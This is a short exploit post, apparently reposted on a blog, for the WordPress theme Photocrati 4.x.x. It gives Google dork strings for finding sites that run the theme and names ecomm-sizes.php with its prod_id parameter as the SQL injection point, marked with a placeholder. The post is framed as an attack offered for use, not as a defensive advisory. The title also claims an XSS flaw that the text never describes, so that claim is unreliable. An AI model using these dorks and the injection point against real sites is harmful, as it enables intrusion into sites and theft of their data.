Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS Vulnerabilities







# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]
  
  
--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes
  
attacker can do a remote injection in site URL to get some sensitive information .
almost all version are infected by this vunl.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]
  
greetz to all muslims and all tryag member's
:) from morocco
 
        1337day.com [2015-03-23]  #

Belum ada Komentar untuk "Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS Vulnerabilities"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel